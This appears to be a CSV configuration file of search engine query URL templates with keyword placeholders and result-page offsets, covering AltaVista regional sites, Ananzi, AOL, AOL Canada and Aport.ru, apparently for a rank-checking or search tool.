"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","Altavista PT 5 (Next 50)","http://pt.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista SE","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","AltaVista SE","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista SE","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista SE","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista SE","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista SE","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista SE 2 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista SE 3 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista SE 4 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista SE 5 (Next 50)","http://se.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista UK","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","1"
"International","AltaVista UK","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista UK","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista UK","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista UK","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=0","0"
"International","AltaVista UK","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0","0"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","1"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=50","0"
"International","AltaVista UK 2 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=50","0"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","1"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=100","0"
"International","AltaVista UK 3 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=100","0"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","1"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=150","0"
"International","AltaVista UK 4 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=150","0"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","1"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results/?qbmode=&aqa={SEARCH_KEYWORD}&aqp=&aqo=&aqn=&kgs=1&kls=1&avkw=xytx&stq=200","0"
"International","AltaVista UK 5 (Next 50)","http://uk.altavista.com/web/results?itag=ody&q={SEARCH_KEYWORD}&kgs=1&kls=0&stq=200","0"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","1"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","0"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","0"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","0"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","0"
"International","Ananzi Search Engine","http://www.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=10&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0","0"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","1"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","0"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","0"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","0"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","0"
"International","Ananzi Search Engine 2 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=11","0"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","1"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","0"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","0"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","0"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","0"
"International","Ananzi Search Engine 3 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=21","0"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","1"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","0"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","0"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","0"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","0"
"International","Ananzi Search Engine 4 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=31","0"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","1"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","0"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","0"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","0"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","0"
"International","Ananzi Search Engine 5 (Next 10)","http://search1.ananzi.co.za/cgi-bin/ananzi/ananzi-apisearch.pl?query.html?ht=0&qt={SEARCH_KEYWORD}&qs=&qc=&pw=100%25&ws=0&qm=0&st=1&nh=100&lk=1&rf=0&si=1&rq=0&col=sasites&rq=0&andy=41","0"
"International","AOL","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}","1"
"International","AOL","http://search.aol.com/aolcom/search?invocationType=topsearchbox.search&query={SEARCH_KEYWORD}","0"
"International","AOL","http://search.aol.com/aolcom/search?invocationType=topsearchbox.search&query={SEARCH_KEYWORD}","0"
"International","AOL","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}","0"
"International","AOL","http://search.aol.com/aolcom/search?invocationType=topsearchbox.search&query={SEARCH_KEYWORD}","0"
"International","AOL 2 (Next 15)","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=25","1"
"International","AOL 3 (Next 15)","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}&first=26&last=40","1"
"International","AOL 4 (Next 15)","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=55","1"
"International","AOL 5 (Next 15)","http://search.aol.com/dirsearch.adp?query={SEARCH_KEYWORD}&first=56&last=70","1"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","1"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","0"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","0"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","0"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","0"
"International","AOL CA","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&start=&from=topsearchbox.&query_mod=","0"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","1"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 2 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=11&last=20&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","1"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 3 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=21&last=30&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","1"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 4 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=31&last=40&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","1"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","AOL CA 5 (Next 10)","http://search.aol.ca/dirsearch.adp?query={SEARCH_KEYWORD}&first=41&last=50&start={SEARCH_KEYWORD}&layer=&layer&query_mod=","0"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","1"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","1"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","0"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","0"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","0"
"International","Aport.ru","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}","0"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","1"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","0"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","0"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","0"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","0"
"International","Aport.ru 2 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=1&HID=1_2_3_4","0"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","1"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","0"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","0"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","0"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","0"
"International","Aport.ru 3 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=2&HID=1_2_3_4","0"
"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","1"
"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","0"
"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","0"
"International","Aport.ru 4 (Next 10)","http://sm.aport.ru/scripts/template.dll?r={SEARCH_KEYWORD}&id=44584098&p=3&HID=1_2_3_4","0"
